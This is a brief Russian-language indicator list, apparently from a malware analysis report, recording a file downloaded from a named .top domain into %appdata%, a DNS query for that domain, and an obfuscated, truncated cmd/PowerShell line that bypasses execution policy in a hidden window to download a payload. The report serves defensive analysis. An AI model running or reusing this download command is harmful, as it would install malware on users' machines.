Техническая информация
- http://sutraponef.top/read.php?f=0.dat как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /c "P^Ow^erS^H^EL^l^.e^xE^ -e^X^ecU^TI^O^n^POl^i^C^Y^ BypASs ^-No^prO^fi^lE -wInD^OwsT^Yle^ ^hIDdE^n^ (nEw-OB^JEct sy^S^TEM.^net.weBc^lie^Nt^)^.dOWnlo^aD^F^il^e('http://sutraponef.t...
- DNS ASK su###ponef.top
- '<SYSTEM32>\cmd.exe' /c "P^Ow^erS^H^EL^l^.e^xE^ -e^X^ecU^TI^O^n^POl^i^C^Y^ BypASs ^-No^prO^fi^lE -wInD^OwsT^Yle^ ^hIDdE^n^ (nEw-OB^JEct sy^S^TEM.^net.weBc^lie^Nt^)^.dOWnlo^aD^F^il^e('http://sutraponef.t...' (со скрытым окном)